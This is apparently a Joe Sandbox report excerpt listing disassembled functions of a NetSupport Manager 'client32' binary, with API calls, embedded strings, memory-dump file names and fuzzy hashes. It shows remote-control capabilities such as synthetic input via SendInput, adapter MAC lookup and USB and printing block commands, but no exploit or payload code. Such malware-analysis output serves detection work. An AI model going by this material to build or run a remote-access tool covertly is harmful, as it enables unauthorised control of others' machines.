GetProcAddress.KERNEL32(?,SendInput), ref: 110FD43A
FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD526

Strings

user32, xrefs: 110FD3A8
0, xrefs: 110FD3F3
GetGUIThreadInfo, xrefs: 110FD3BF
SendInput, xrefs: 110FD434

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad_memset
String ID: 0$GetGUIThreadInfo$SendInput$user32
API String ID: 530983809-271338563
Opcode ID: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
Instruction ID: 43fa602a4ac72add29387a7c175e2a735ec2c38defe54f2081db145d70293a55
Opcode Fuzzy Hash: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
Instruction Fuzzy Hash: DBA1A270E043A69FDB16CF64CC85BADBBF9FB44708F0081A9E52897284DB759A84CF51

Function 1105D190 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32(111E9674), ref: 1105D1F2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
TranslateMessage.USER32(?), ref: 1105D2F6
DispatchMessageA.USER32(?), ref: 1105D2FC

Strings

NSMCobrProxy, xrefs: 1105D1E8, 1105D22C, 1105D2B7
CobrowseProxy.cpp, xrefs: 1105D204, 1105D245
_bOK, xrefs: 1105D209
m_hAppWin, xrefs: 1105D24A
CobrowseProxy::RunCobrowse, xrefs: 1105D1BA

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
API String ID: 13347155-1383313024
Opcode ID: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
Opcode Fuzzy Hash: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61

Function 685BAC02 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 685BAC70
__getptd.LIBCMT ref: 685BAC82
___TypeMatch.LIBCMT ref: 685BACB3
__getptd.LIBCMT ref: 685BACC9
___BuildCatchObject.LIBCMT ref: 685BACE5
__getptd.LIBCMT ref: 685BAD1A
__getptd.LIBCMT ref: 685BAD2C

Strings

csm, xrefs: 685BAC38
RCC, xrefs: 685BAC24
MOC, xrefs: 685BAC19
csm, xrefs: 685BACEF

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __getptd$BuildCatchMatchObjectType
String ID: MOC$RCC$csm$csm
API String ID: 1559916381-1441736206
Opcode ID: 967c4be431842f86d27200744e3b9d4431ee30aa788ba5d335eb788f4280d563
Instruction ID: 6d132c142fd04e4b751a78394098be51ec548bb192a40c60a071edda1d065b44
Opcode Fuzzy Hash: 967c4be431842f86d27200744e3b9d4431ee30aa788ba5d335eb788f4280d563
Instruction Fuzzy Hash: 1F31A435902344CFDB22CF64C4A476D77F8BF60306FD448AAD869A7251E734D944CB91

Function 110290F0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 97windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?), ref: 1102910C

Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8

wsprintfA.USER32 ref: 11029157
MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
ExitProcess.KERNEL32 ref: 110291A9
_strrchr.LIBCMT ref: 110291E5
ExitProcess.KERNEL32 ref: 11029224

Strings

Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
Client32, xrefs: 11029185
V12.10F4, xrefs: 11029143
Info. assert, restarting..., xrefs: 1102920D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
API String ID: 2763122592-3703414834
Opcode ID: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
Instruction ID: 0c35b4c0934c547b9efc755c54c54cf2bc7aea1eab2dc2738ce497f42af58575
Opcode Fuzzy Hash: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
Instruction Fuzzy Hash: 8D310B75A0122AAFE711DFE5CCC5FBAB7A9EB4470CF104028F72587281E670A940CB61

Function 1113B200 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1113B29B
__CxxThrowException@8.LIBCMT ref: 1113B2B0
SetPropA.USER32(?,?,00000000), ref: 1113B33E
GetPropA.USER32(?), ref: 1113B34D
wsprintfA.USER32 ref: 1113B37F
RemovePropA.USER32(?), ref: 1113B3B1

Strings

UI.CPP, xrefs: 1113B301, 1113B322, 1113B392
NSMStatsWindow::m_aProp, xrefs: 1113B327
hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 1113B379

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$wsprintf$Exception@8RemoveThrow_memsetstd::exception::exception
String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 1006086998-1590351400
Opcode ID: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
Opcode Fuzzy Hash: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5

Function 110FD040 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 155threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
GetCurrentThreadId.KERNEL32 ref: 110FD17C
GetCurrentThreadId.KERNEL32 ref: 110FD18A

Strings

LogWhileConnected, xrefs: 110FD10F
Client, xrefs: 110FD089, 110FD114
PLATFORM.CPP, xrefs: 110FD159
nstrings <= 4, xrefs: 110FD15E
*Log_%d, xrefs: 110FD06C
Event. %s, xrefs: 110FD1A6

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentThread$ErrorLast__wcstoi64
String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
API String ID: 2021241812-3565238984
Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1

Function 685A7F80 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A7F9F
LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,6859B916,?,00000100,00000006,00000001), ref: 685A7FAC
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685A7FCB
_malloc.LIBCMT ref: 685A7FFB
wsprintfA.USER32 ref: 685A807C
_free.LIBCMT ref: 685A8110

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 685A811C

Strings

iphlpapi.dll, xrefs: 685A7FA7
GetAdaptersInfo, xrefs: 685A7FC5
%02X%02X%02X%02X%02X%02X, xrefs: 685A8076

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
API String ID: 1404005415-834977148
Opcode ID: 13d306030e1f1ed31f758a05c3fbd420f405adb4712eb071fb593e591294e547
Instruction ID: 12e4af435aa906d974b962e3880e2ca00fa747ed4b6fe55e5d9d71e1752375d4
Opcode Fuzzy Hash: 13d306030e1f1ed31f758a05c3fbd420f405adb4712eb071fb593e591294e547
Instruction Fuzzy Hash: 57511771A042859BDF01CFB89CE4AEE7BF9EF49300F444165ED69EB241E7319905C761

Function 1103D180 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 146COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1103D1D3

Strings

SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
BLOCKPRINTING, xrefs: 1103D23D
RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
SETOPTICALDRIVEACCESS, xrefs: 1103D214
BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
IsA(), xrefs: 1103D284
SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 4104443479-1830555902
Opcode ID: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
Opcode Fuzzy Hash: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1

Function 11045364 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 1104545D
GetTickCount.KERNEL32 ref: 110454A6
GetTickCount.KERNEL32 ref: 110454C6

Strings

RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544
IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FreeString
String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
API String ID: 2011556836-2400621309
Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90

Function 11059020 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164synchronizationtimeCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,7E4636A2), ref: 11059069
EnterCriticalSection.KERNEL32(?), ref: 110590CE
timeGetTime.WINMM ref: 110590FC
GetTickCount.KERNEL32 ref: 11059136
LeaveCriticalSection.KERNEL32(?), ref: 110591AA
EnterCriticalSection.KERNEL32(?), ref: 110591C4
LeaveCriticalSection.KERNEL32(?), ref: 110591E9

Strings

_License, xrefs: 11059167
maxslaves, xrefs: 11059162

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
String ID: _License$maxslaves
API String ID: 3724810986-253336860
Opcode ID: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
Opcode Fuzzy Hash: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1

Function 1104B12F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

PostMessageA.USER32(0000FFFF,0000C1E7,00000000,00000000), ref: 1104B225
PostMessageA.USER32(00010480,0000048F,00000032,00000000), ref: 1104B256
PostMessageA.USER32(00010480,00000483,00000000,00000000), ref: 1104B268
PostMessageA.USER32(00010480,0000048F,000000C8,00000000), ref: 1104B27C
PostMessageA.USER32(00010480,00000483,00000001,?), ref: 1104B293
